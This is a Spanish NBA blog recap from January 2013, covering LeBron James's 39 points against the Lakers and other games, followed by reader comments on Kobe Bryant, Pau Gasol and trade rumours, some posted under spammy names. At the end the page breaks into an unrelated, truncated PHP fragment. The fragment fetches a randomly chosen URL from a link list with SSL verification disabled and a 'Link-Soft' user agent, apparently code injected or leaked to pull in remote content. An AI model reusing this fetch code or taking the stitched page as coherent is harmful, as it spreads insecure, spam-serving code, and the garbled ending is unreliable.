La Crónica: Otra vez Lebron

18 de January de 2013 por Viva_Dirk

Lebron James volvió a hacerlo, esta vez en el Staples frente a los Lakers. Sus cifras ya casi ni nos sorprenden cuando deberían asustarnos. Los 39 puntos, 7 rebotes, 8 asistencias, 3 robos y 68% en tiros de campo son de otra época, pero él los lleva cabo en pleno siglo XXI. Con esto y un buen Wade se puede ir a conquistar cualquier plaza. Sin embargo, los Lakers vendieron cara su piel con un gran acierto desde la línea de 3. No estuvieron más cerca de ganar el partido por un día nefasto de Howard desde la línea de personal. 8 tiros libres de 13 intentos falló el angelito. Gasol volvió y jugó 25 minutos desde el banco (99-90).

En Londres, los Knicks ganaron sin problemas a Detroit. Al descanso iban 15 arriba y exactamente esa sería la renta al final del partido (102-87). Carmelo lideró el ataque con 26 puntos, con cuatro compañeros más en dobles dígitos, incluidos 17 puntos de Amare en 20 minutos a base de tiros libres. Los Pistons pagaron un desastroso partido de Knight y las dificultades de Monroe para anotar. Los mejores fueron Will Bynum con 22 puntos y Andre Drummond con un doble-doble, ambos desde el banco. 

Ante los Wolves comprobamos la profundidad de la plantilla de la que disponen los Clippers. En el tercer partido sin Chris Paul consiguieron su tercera victoria consecutiva pese al mal partido de Bledsoe. Jamal Crawford y Blake Griffin anotaron 22 y 20 puntos respectivamente mientras Lamar Odom hacía un partido muy suyo: Prácticamente sin anotar y tirar a canasta se fue hasta 12 rebotes y 6 asistencias. En los locales sólo Ridnour y Kirilenko opusieron resistencia. El resto sumó un 14 de 55 en tiros de campo (90-77).

En Phoenix, los Bucks se llevaron la victoria a base de intimidación y algo de la anarquía que crean Jennings & Ellis. Entre ambos anotaron 40 puntos, repartieron 10 asistencias y perdieron 10 balones. No podemos decir que nos sorprendan, como tampoco nos sorprende un nuevo partidazo de Larry Sanders, que fue el mejor de su equipo, y la gran aportación desde el banco de Dunleavy y Henson. Shannon Brown fue el mejor de los Suns, con una decente aportación de Scola y Dudley pero una versión mediocre del resto de sus compañeros (98-94).

PREMIOS

MVP: No hay mas que decir, Lebron James es, en palabras de Clint Eastwood en “El sargento de hierro”, ‘una maquina de matar y amar’. No hay nada que se le escape dentro de una cancha de baloncesto.

Rookie: Andre Drummond pide paso. 11 puntos, 10 rebotes, 2 tapones y 2 robos en su hoja estadística de ayer. John Henson sigue disfrutando de buenos minutos y él los sigue aprovechando. Anoche 10 puntos y 6 asistencias.

Sorpresa: Lamar Odom puede ser un arma definitiva para los Clippers. Cuando un jugador de su clase tiene ganas de jugar puede dominar un partido sin tirar a canasta, como demuestran sus 12 rebotes y 6 asistencias en 25 minutos.

Decepción: Malos partidos de Nikola Pekovic y Marcin Gortat pero no tan malos como para llevarse el premio. Brandon Knight hizo todos los méritos tras jugar 18 minutos y anotar 1 punto con un 0 de 4 en tiros de campo.

Esfuerzo en vano: Will Bynum con 22 puntos y Shannon Brown con 20 puntos y 5 rebotes hicieron un gran esfuerzo, pero no tan grande como el de Luke Ridnour que pese a sus 21 puntos, 4 rebotes y 5 asistencias se fue de vacío a casa.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

39 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Se acaban los calificativos para esta máquina del baloncesto.En el partido vs Warriors salió una estadística que uno piensa que es imposible,porque el 6 de Miami lleva ya unas cuantas temporadas a gran nivel y es imposible que mejore en algo,pero es que esta temporada es su mejor temporada en lo que se refiere a % tiros de campo y triples,y rebotes.Es un escándalo.

    Por cierto,¿hay sensación de que este año Timberwolves tampoco?Shved parece que sufre el rookie wall en los últimos partidos,probablemente la recuperación de Ricky lleve toda la temporada -en relación a esto quiero ver cómo vuelve Rose-,Love lesionado cada dos por tres…aún tienen balance para luchar pero mi impresión es que no han tenido suerte con las lesiones y que muchos jugadores han rendido al 110% en el inicio de temporada.

      Citar

  2. GreenPride dice:
    #2

    El Rey tomó LA… No se puede decir más que cuando LeBron juega así es imposible de parar. Partidazo increíble contando además con la ayuda del “escudero” Wade. El resto del equipo no está para muchos trotes pero entre los dos sacaron adelante un partido en el que los Lakers parecieron dar señales de mejoría en su juego. Mejor defensa en general y mucho mejor aprovechamiento de sus interiores dando balones a Howard y también a Gasol por dentro. En cuanto a Gasol salió del banquillo y jugó bastante de 5 en lo que podría ser el rol que más le va en los actuales Lakers de no ser traspasado. Partido horrible de Kobe hasta el último cuarto donde empezó a meter y puso a los Lakers a punto de poder ganar pero el Rey tenía otros planes. Los Heat tiraron bastante más de Joel Anthony para defender a las torres de LA y aunque sus secundarios no están en su mejor momento siguen caminando hacia el final de la temporada sin prisas pero ganando los partidos que importan y para mí siguen siendo los máximos favoritos a pesar de que gente como Ray Allen o Rashard Lewis no son ni la sombra de jugadores all-star que fueron un día

      Citar

  3. Esteban dice:
    #3

    alguien puede entender a d´abtoni? es verdad que ma alla de los 5 “titulares” no cuentan con buenos mimbres para hacer un equipo solido, pero la ofensiva de los lakers da pena, y esa seria su especialidad

    nash es solo el recuerdo de otras epocas, anoche no pudo desequilibrar nunca, corre corre y corre, pero sin tener a quien darle la bola

    kobe empeñado en jugar mejoer que lebron, le salio el tiro por la culata y se llevo una baño de sangre, LOS AÑOS NO VIENEN SOLOS

    y la cantidad de perdidas de balor por intentar darle la bola a howard es espasmodica, uno tras otro pase fue cortado, por que no habia una jugada para que howard pueda recibir

    una pena, pero estos lakers no van a ningun lado, clasificar a PO y caer en primera ronda deberia ser un premio

      Citar

  4. Esteban dice:
    #4

    lo unico positivo de los lakers, la inclusion de pau como sexto hombre, gracias a ello, no jugo con howard y pudo estar cerca del aro, donde como lider de la segunda unidad rindio, si adopta bien ese rol, puede ayudar a su equipo a clasificarse

      Citar

  5. Alfredo dice:
    #5

    Es mi sensación, o quizá se está cumpliendo el objetivo de Stern de que cada vez haya una mayor igualdad?? (aunque tenga que hacer uso a veces del Sternato…)

      Citar

  6. HisRoyalAirness dice:
    #6

    Bueno chicos, hace una buena temporada que no comento y vengo conganas de rajar.

    Para empezar, Lebron es el mejor y nadie lo duda pero tampoco olvidemos el EQUIPAZO que tiene a su alrededor.

    Y acerca de Kobe Bryant: he visto bastante de Lakers (por desgracia) y me sorprende que se salve tanto de la quema. Si el propio Lebron cuando se fue a Miami no tuviese a su equipo en Playoffs la crucifixión podría haber sido escandalosa. Por qué esta permisividad? Para mí es imperdonable la situación y es un fracaso estrepitoso y sí, él es el jugador franquicia y tiene gran parte de culpa.

    Respecto a “mis” Wolves, creo que hacen lo que pueden. Tienen una plantilla muy limitada y si tu jugador franquicia se rompe 2 veces la mano en 3 meses y tu mayor promesa está aún renqueante poco se puede hacer. Ah, y sin Adelman. Ayer había un quinteto que era: Barea- Ridnour-Cuningham-Williams-Stiemsa. Con todos los respetos, eso no es equipo ni es nada. Han tenido muy mala suerte en la Conferencia más competitiva

      Citar

  7. Esteban dice:
    #7

    HisRoyalAirness:
    Bueno chicos, hace una buena temporada que no comento y vengo conganas de rajar.

    Y acerca de Kobe Bryant: he visto bastante de Lakers (por desgracia) y me sorprende que se salve tanto de la quema. Si el propio Lebron cuando se fue a Miami no tuviese a su equipo en Playoffs la crucifixión podría haber sido escandalosa. Por qué esta permisividad? Para mí es imperdonable la situación y es un fracaso estrepitoso y sí, él es el jugador franquicia y tiene gran parte de culpa.

    quiza por q tiene 5 titulos en la NBA, y ha llegado a 7 finales de liga, quiza termine como segundo maximo anotador de todos los tiempos de la nba, convirtio 81 puntos en un juego y por sobretodo A PESAR DE LOS MALOS AÑOS Y ALGUNOS INTENTOS DE FUGA AH SIDO LEAL A SU EQUIPO SIEMPRE

    dudo que el cleveland digan lo mismo del REY

      Citar

  8. Simon dice:
    #8

    Esteban: A PESAR DE LOS MALOS AÑOS Y ALGUNOS INTENTOS DE FUGA AH SIDO LEAL A SU EQUIPO SIEMPRE

    dudo que el cleveland digan lo mismo del REY

    Hombre en eso tambien ayuda que tu equipo desde que eres Rookie sean los Lakers… a saber que hubiera sido de Bryant si hubiera caido en Cleveland, en Grizzlies o en Bucks por citar 3 equipos cualquiera… aun así tiene un mérito enorme, pero si tu franquicia está en una de las mejores ciudades, con uno de los mercados mas grandes, con una gran historia detrás, una franquicia donde todo el mundo quiere ir a jugar pues es mucho mas fácil serle fiel.

      Citar

  9. nba dice:
    #9

    Hombre eso de caer…, a alguien le suena el traspaso por Divac???
    Respecto a la derrota de ayer de Lakers, es lo que mejor les podria haber pasado ahora que empiezan una serie de partidos fuera de casa, esa es la rotacion que deberian mantener hasta final de RS, incluyendo mas minutos de Meeks, salvo en el caso que hagan un traspaso.
    Después de n meses insitiendo en que Pau tiene que salir desde el banquillo, a ver si D’antoni no se arrepiente y lo sigue mantiendo asi por el bien del equipo, esperemos que Pau lo acepte y disfrute del lugar de la cancha donde jugara a partir de ahora

      Citar

  10. Esteban dice:
    #10

    Simon: Hombre en eso tambien ayuda que tu equipo desde que eres Rookie sean los Lakers… a saber que hubiera sido de Bryant si hubiera caido en Cleveland, en Grizzlies o en Bucks por citar 3 equipos cualquiera… aun así tiene un mérito enorme, pero si tu franquicia está en una de las mejores ciudades, con uno de los mercados mas grandes, con una gran historia detrás, una franquicia donde todo el mundo quiere ir a jugar pues es mucho mas fácil serle fiel.

    esta bien simon, tienes razon, pero ello no quita el hecho que kobe ha sido un jugador insignia de los LAKERS durante 15 años, y los ha llevado a la maxima gloria, asi que es dificil que los fanaticos de los lakers piensen en EL como un problema, mas bien prefieren pensar en que los que lo rodean son el problema y creo que se lo ha ganado, con respeto, trabajo y sobretodo LOGROS

    comparto con nba, pau se ve mejor saliendo del banquillo y jugando muchos minutos de centro, eso refuerza mi iodea que pau deberia salir de los lakers y firman en otro equipo para jugar de pivote, duncan y garnett han perdido su explision y movimiento y han hecho la transformacion a la posicion de centro, pau tiene el tamaño para hacerlo, mientras sigan haciendolo jugar como un crio atletico de 4 sus prestaciones iran cada vez mas a la baja, en cambio de centro las cosas pueden cambiar,

    q bien vendria un trade josh smith por gasol, PARA AMBOS

      Citar

  11. Moloneador dice:
    #11

    Los Lakers de Shaq, no de Kobe, una vez se fue el “perro grande” si, los Lakers de Kobe

      Citar

  12. Jose Luis dice:
    #12

    Horford podría volver a jugar de 4… pero Atlanta quiere jugar la baza del espacio salarial para el año próximo, tratando de conseguir a Howard que es de Atlanta y alguna estrella más. Sin embargo, en estas fechas es muy difícil que un agente libre salga a otro equipo si no es con sign & trade. Podría funcionar, pero si no se ha hecho ya es porque los Hawks no quieren.

      Citar

  13. Esteban dice:
    #13

    Jose Luis:
    Horford podría volver a jugar de 4… pero Atlanta quiere jugar la baza del espacio salarial para el año próximo, tratando de conseguir a Howard que es de Atlanta y alguna estrella más. Sin embargo, en estas fechas es muy difícil que un agente libre salga a otro equipo si no es con sign & trade. Podría funcionar, pero si no se ha hecho ya es porque los Hawks no quieren.

    los directivos de los hawks estan medios chiflados, es una utopia pensar que howard dejara los angeles para jugar en atlante, o que desechara una oferta de dallas, o houston o los propios nets para jugar en los hawks

    y ademas de howard quieren otra estrella mas? howard pedidra el maximo, 22 millones serian? ya tienen 12 millones comprometidos con horford, estarian en 34 y hay 5 millones para luis williams, 39 millones, mas la renovacion de teague… 7 u 8 millones?

    les quedarian algo asi como 10 millones en el tope, mas los 5 de la exepcion, cuantas estrellas y super equipo puedes puedes juntar con eso?

      Citar

  14. Jose Luis dice:
    #14

    Creo que lo máximo que podría cobrar Howard el primer año serían unos 17-18 (lo que está cobrando Deron Williams en su primer año).

    Pero sí, es cierto, parece demasiado, a no ser que renovasen a Josh Smith (tienen sus derechos Bird). Howard, Horford, Smith, Louis, Teague, Korver, Jenkins, Pachulia… no es mal equipo.

    Dicho todo esto, dudo mucho que Howard vaya a Atlanta a jugar. No va a dejarse llevar por factores emocionales ya, este va a por la pasta y renovará en Lakers salvo catástrofe.

      Citar

  15. safd dice:
    #15

    esq ofertas mejores q pau gasol por josh smith seguro q tendran para reconstruir, mucho mejor rondas y jovenes que comerte los 20K de pau gasol que ahora mismo no vale nada en el mercado NBA.

    entre tener espacio salarial o comerme 22K al año de Pau(si no recuerdo mal, si pau sale traspasado cobraria un 10% mas o algo asi por una clausula en su contrato) , no tengo ninguna duda, mejor un par de años a reconstruir q tener temporadas perdiedno en primera ronda, si esq con el Pau actual se puede llegar a eso

    los lakers se comeran los 20K de pau y los 7 de world peace, es asi, y si los traspasan, no van a conseguir ningun all-star

      Citar

  16. Vader dice:
    #16

    Buenas a todos, unas pocas cosillas queria comentar…

    Quien me iba a decir a mi que a estas alturas de temporada no quisiera un posible traspaso Stat por Pau Gasol. Ahora mismo Gasol ofrece muchas dudas por su nivel físico y de lesiones. No por su calidad, ahí yo lo pongo encima de muchos.

    Parece que a John Wall le ha venido bien la lesión, ¿Ahora reparte más asistencias o me lo parece a mi? Sea como sea desde que ha vuelto su equipo no para de ganar… Y el rookie Beal tiene una pinta, ¿Traspasarlo por Rudy Gay? No creo que sean tan tontos en Washington.

    Me gusta la segunda juventud de Vince Carter y que vuelva a entrar hasta la cocina para hacer mates. No llega tan arriba como antes, por supuesto, pero se le ve con ganas y motivado. Durante unos cuantos años fue un top de la liga y me alegro que lo siga demostrando.

    Y ya para terminar, 52 puntos de Kevin Durant. Los Blazers ya no son sólo el equipo que dejo pasar a Michael Jordan, también dejaron pasar a Kevin Durant. Por Sam Bowie y por Greg Oden…

    Saludos

      Citar

  17. Denise dice:
    #17

    Hombre, yo creo que Howard renovará por Lakers para que no le acusen de cagao y de que tras fracasar en su primer año se bajó del barco.
    Pero la oferta de Atlanta no es mala, Atlanta es una ciudad muy importante de Estados Unidos, con un gran mercado, sede de importantisimas multinacionales y que llegó a albergar los JJ.OO. del 1996, vamos que no estamos hablando de un pueblucho.
    Y deportivamente, si saben moverse pueden armar un gran equipo en torno a Howard. Podrían empezar a dar la campanada seduciendo y fichando a Superman, eso supondría casi seguro la renovación automatica de Josh Smith. A Horford lo podrían traspasar por un escolta (Monta Ellis?) y todavía le quedarian unos 8 milloncetes para fichar agentes libres más los contratos garantizados de Lou Williams, Stevenson y Jenkins, y otros como Korver, Pachulia o Harris podrían renovar a la baja.

    Los Wizards con la vuelta de Wall parecen otros, pero su futuro a corto plazo está bastante hipotecado con el contrato de Okafor. Hasta la 14/15 que se libraran de Okafor, Ariza y Vesely (que fracaso del checo) no podrán armar un equipo ganador.

    Y del partido estrella, Mavs-Thunder, al margen de los 52 puntos de Durant que ya deja de ser noticia, vaya mate en la cara de Carter en la cara de Ibaka!!!, Grande Vince rememorando sus buenos años.
    Pero no pudo forzar una 2º prorroga con ese triple a lo Navarro.

    Y si hay algun equipo que sale reforzado animicamente de cara a la temporada que viene, son los Bulls, temporadon que se estan marcando sin su estrella Rose y además, ganando ayer en el TD de Boston con Deng retirandose lesionado, ya estaba tocado de antes el inglés. y con Belinelli anotando casi sobre la bocina un tiro desequiibrado.

      Citar

  18. Denise dice:
    #18

    Vader:
    Buenas a todos, unas pocas cosillas queria comentar…

    Quien me iba a decir a mi que a estas alturas de temporada no quisiera un posible traspaso Stat por Pau Gasol. Ahora mismo Gasol ofrece muchas dudas por su nivel físico y de lesiones. No por su calidad, ahí yo lo pongo encima de muchos.

    Yo creo que Gasol es ahora mismo intraspasable. Un trade 1×1 por él se me antoja imposible, y en el caso de ser traspasado, estaría envuelto en un mega traspaso con una decena de jugadores de por medio.
    Yo me pongo en la piel de un GM y ahora mismo, no querría a un Gasol demacrado y enfermo cobrando 20 kilos a no ser que pudiera liberarme de un Biedrins, Turkoglu o un Ilyasova de la vida…durante el traspaso.

      Citar

  19. pronosticos deportivos dice:
    #19

    Lo peor de todo es que hay gente que todavia discute a Lebron… Yo personalmnte soy más de Kobe me parece un jugador mucho más estético que Lebron, pero no hay duda de que este es una bestia y se va a hacer un hueco entre los grandes

      Citar

  20. rumbero dice:
    #20

    Yo me quedo con el partido de Holiday contra los Raptors. Una barbaridad. 33 puntos, 14 asistencias, enviando el partido a la prórroga a falta de 2 segundos y metiendo todos los puntos de los Sixers (12) en el OT para ganar. Suerte tienen en Philadelphia de contar con él mientras Turner sigue como proyecto de futura estrella

      Citar

  21. Jose Luis dice:
    #21

    A ver que hacen los Lakers en Toronto hoy… buena hora para verles, las 7 de la tarde.

      Citar

  22. Denise dice:
    #22

    ¿Alguien conoce a Chris Johnson? Un tio que esta noche ha hecho un 15-6 con los Wolves y me lo acabo de coger en la Hoops….

      Citar

  23. Pikerton64 dice:
    #23

    Ya te he contestado Denise en la Hoops, pero lo repito aquí.
    El Target Center coreaba MVP MVP MVP cuando Chris Johnson tiraba tiros libres para llegar apenas a los 11 puntos (ese, por cierto, fue el único tiro libre que falló en el partido).
    El partido fue mediocre, con resultado europeo hasta más de la mitad del partido, no llegaban a 50 puntos pasados 5 minutos del 3er cuarto, momento en el que Houston anotó su primera canasta de la segunda mitad, para que veáis. En la primera mitad Johnson solo había hecho la jugada del partido, y Gelebale nada, pero yo creo que todo el Arena tenía ganas de que Porter, que está demostrando ser muchísimo mejor entrenador que Adelman, pidiendo tiempos muertos apenas nos marcan y reducen un poco la ventaja (debe de haber una estadística que refleje que los Wolves han perdido todos sus partidos tras tener ventaja de 10+ puntos) y no cuando ya nos han remontado y ganado el partido, haciendo cambios geniales y manejando de manera sublime a un equipo que pierde por ser malo, no saber anotar, no rebotear y otros defectos, aparte de la desgracia que supone para el baloncesto que este equipo de los Wolves, que mucho podría darle a este deporte, se haya quedado en nada por las lesiones; volviera a meter a Johnson. En resumidas, la gente quería volver a ver a Johnson, y Terry correspondió.
    Entraron él y Gelabale mientras Barea amasaba la bola y jugaba solo, pero en eso el muchacho de la D-League cogió un par de rebotes ofensivos, para alegría de la afición local. Luego hizo un alley-hoop y entró Ricky (que ahora sí recuerda al del año pasado en su “insoportable” (para sus rivales) energía, defensa y manos, y cada vez más en sus pases). Para molestia de Shved (lesionado) o Ricky, la plantilla de Minnesota es incapaz de anotar bajo el aro (SOLOS) o en cortes, destrozándoles las estadísticas de asistencias, pero ellos siguen intentándolo. A Ricky, amante del baloncesto espectáculo (que cosas, si es que como deporte es un espectáculo, y no la cienca que pretenden algunos frustados entrenadores) le gustan los muchachos que, como Derrick, se prestan a ello en mates y jugadas que estallen en júbilo a esta afición tan castigada. Por ello, y porque quiere integrar a estos motivados novatos (y porque se prestaban a darle las asistencias de las que hablé antes), Johnson y Gelabale se convirtieron en su foco de pases, lo que propició triples de Gelabale y tiros libres para Chris Johnson, que cerró con otro mate una noche en la que cogió más rebotes ofensivos de los que la máquina pueda reflejar. Además, en la segunda y definitiva ida de Minnesota en el marcador él fue autor de 9 de 11 puntos consecutivos de Minnesota, siendo el francés del Pames- Power Electronics el anotador de los otros 2 puntos. Un gran partido, al final, y un gran juego de AK, Rid (estos dos como siempre) y de los agentes libres que se combinaron para más de 1/4 de los puntos de Minny.

      Citar

  24. HisRoyalAirness dice:
    #24

    Dwight Howard derrochando inteligencia y madurez

      Citar

  25. Denise dice:
    #25

    Gracias Pkt.

    Bueno, pues partidazo el que están ofreciendo Raptors y Lakers. 53-49 al descanso para los canadienses, y Howard que ha sido expulsado por un forcejeo al pelear el rebote en un tiro libre. Muy riguroso me ha parecido a no ser que haya habido algun insulto de por medio. Y el Big 3 de Lakers no lo estan formando Gasol (desaparecido), Howard (desquiciado y expulsado) y Bryant (tirando mandarinas por todas partes) sino Clark, Nash y Metta WP. Éstos 3 estan aguantando el buen juego en conjunto de los canadienses. Mención especial para el ex de los Magic que va a hacer otro doble-doble con la gorra. No he visto mucho de los Raptors este año, pero creo que Fields va camino de hacer uno de los mejores partidos esta tempotrada.

      Citar

  26. Denise dice:
    #26

    Denise:

    Mención especial para el ex de los Magic que va a hacer otro doble-doble con la gorra

    Con el ex de los Magic me refiero a Earl Clark…no a Superman.

      Citar

  27. nba dice:
    #27

    Si pierden en toronto que se despidan de entrar en playoffs, que desproposito

      Citar

  28. rumbero dice:
    #28

    nba:
    Si pierden en toronto que se despidan de entrar en playoffs, que desproposito

    Dos triplacos de Lowry y +15. Los Lakers hoy estan tocando fondo…

      Citar

  29. nba dice:
    #29

    Bueno, bueno, a que esperas Jim para hacer cambios … a que Jack se haga de los Clippers ??

      Citar

  30. franitis dice:
    #30

    MVP Calderón 22 pts. 9 asistencias… A pesar del parcial final de LA poco más han podido hacer… Qué mal Gasol, ha lanzado un gancho al aire que me ha dejado loco. Y Howard, buff; un aspirante a ser la superestrella de un equipo como LAL no puede caer en esas cosas.

      Citar

  31. Denise dice:
    #31

    Bueno..yo siempre confié en que los Lakers remontarían e irían para arriba…pero tras lo visto hoy, puedo decir que este equipo no va a entrar en Playoffs salvo un cambio de rumbo muy drástico. Equipo roto, desunido y desquiciado que no es capaz de ganar a un equipucho como Toronto con su pareja interior Bargnani-Valanciunas lesionada y encima pierdes siendo vapuleado en determinados momentos.

    El partido de hoy lo tira por la borda su jugador franquicia, Kobe Bryant con unas mandarinas y una selección de tiro propias de un amateur. Después tu 2º jugador franquicia se le va la olla y se borra del partido. Y que el mejor jugador de tu equipo sea un tío como Earl Clark que en teoría debería ser el jugador nº13..pues dice mucho. Al final Pau se cascó un segundo tiempo de escandalo para acabar con 25 puntos, pero en la primera parte deambuló por la pista. En fin, amigo Nash…si quieres ganar un anillo, ve haciendo las maletas.

    Por los Raptors, muy bien Calderón, el mejor de su equipo, se nota que acaba contrato y el cabrón se está saliendo, el año que viene con otro buen contratito debajo del brazo volverá a defender como una abuela y a lesionarse cada dos por tres.
    Y si hay algun aficionado de Toronto, que me lo confirme, pero creo que es el primer buen partido de Fields en Toronto. De Rozan muy mal, lamentable jugador; y Lowry si es bueno pero no pinta nada en este equipo. No obstante, no me desprendería de él, porque Calderón puede no renovar, o si no renueva se dejará llevar una vez tenga los billetes asegurados en su bolsillo.

      Citar

  32. Denise dice:
    #32

    Yo creo que los Lakers deberían aprovechar el partido de 25 puntos de Gasol y traspasarlo ya por 2-3 jugadores que den mas profundidad y un aire nuevo al equipo.

    Se habla de que Zach Randolph podría recalar en Houston, pero…¿qué podría ofrecer los Rockets a Memphis si excepto Harden los demás tienen contratos bajos?.
    Supongo que ofrecerían a Lin + un par de expirings + un par de rondas de Draft.

      Citar

  33. Jose Luis dice:
    #33

    Creo que cada vez se ve más y mejor que D’Antoni no era para esta plantilla. Una plantilla con tantas estrellas necesita un motivador y alguien que diga las cosas claras, y D’Antoni nunca ha sido eso.

      Citar

  34. Denise dice:
    #34

    Jose Luis:
    Creo que cada vez se ve más y mejor que D’Antoni no era para esta plantilla. Una plantilla con tantas estrellas necesita un motivador y alguien que diga las cosas claras, y D’Antoni nunca ha sido eso.

    A mi D’Antoni siempre me ha parecido un pufo de entrenador. Pese al bonitp run and gun de Suns, siempre pensé que si hubiese manejado mejor las rotaciones y hubieran defendido en partidos claves de Playoffs, aquellos Suns habrían ganado algun anillo.

    El entrenador interino, un tal Bickerstaff o algo así, consiguió un buen balance, a ver si al final él era la solución..xD

      Citar

  35. Pop dice:
    #35

    Denise:

    Por los Raptors, muy bien Calderón, el mejor de su equipo, se nota que acaba contrato y el cabrón se está saliendo, el año que viene con otro buen contratito debajo del brazo volverá a defender como una abuela y a lesionarse cada dos por tres.

    Creo que eres un poco injusto con Calde. No pondré en duda que, como todo jugador, se exprima más en su último año de contrato, pero no creo que podamos catalogarlo como jugador que se rasque la barriga en el resto de temporadas. Defender defiende pobremente,, todas las temporadas y ésta también. En cuanto a lo demás, siempre ha sido un tío constante con buenos números de ataque, sobre todo asistencias/pérdidas y % de tiro. Sus números actuales son los de siempre. No está haciendo nada que no haya hecho ya en todas sus temporadas, sean en mitad o final de contrato.

      Citar

  36. Futurman dice:
    #36

    Decir que De Rozan pese a su mal partido está siendo el mejor de la temporada de los Raptor.

      Citar

  37. franitis dice:
    #37

    Celtics pierde contra Pistons y son 3 derrotas consecutivas tras una racha de 6 partidos ganando, su record ahora es de 20 – 20. ¿Los véis en Play-off?

      Citar

  38. Simon dice:
    #38

    franitis:
    Celtics pierde contra Pistons y son 3 derrotas consecutivas tras una racha de 6 partidos ganando, su record ahora es de 20 – 20. ¿Los véis en Play-off?

    si, en el Oeste tendría mis dudas… pero en el ESTE seguro que si.

      Citar

  39. cepillos oral b dice:
    #39

    Los Celtics llevan una racha que como no cambien no se van a comer un Colin!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>